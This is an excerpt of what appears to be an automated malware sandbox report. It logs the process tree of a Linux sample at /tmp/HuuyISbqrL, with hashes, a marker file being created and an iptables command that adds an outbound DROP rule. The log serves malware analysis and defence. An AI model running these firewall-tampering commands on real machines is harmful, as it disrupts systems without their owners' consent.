                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:sh -c "touch /home/root/ConfigDatecz"
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/bin/touch
                                                                                                                              Arguments:touch /home/root/ConfigDatecz
                                                                                                                              File size:100728 bytes
                                                                                                                              MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/tmp/HuuyISbqrL
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1315556 bytes
                                                                                                                              MD5 hash:f29045435920698fbbe67b121e7bfe79

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:sh -c "iptables -A OUTPUT -p tcp --dport 0 -j DROP"
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/bin/sh
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/sbin/iptables
                                                                                                                              Arguments:iptables -A OUTPUT -p tcp --dport 0 -j DROP
                                                                                                                              File size:99296 bytes
                                                                                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/lib/systemd/systemd
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1620224 bytes
                                                                                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                              File size:22760 bytes
                                                                                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/lib/systemd/systemd
                                                                                                                              Arguments:n/a
                                                                                                                              File size:1620224 bytes
                                                                                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                              General

                                                                                                                              Start time:22:29:59
                                                                                                                              Start date:10/11/2021
                                                                                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                              File size:22760 bytes
                                                                                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e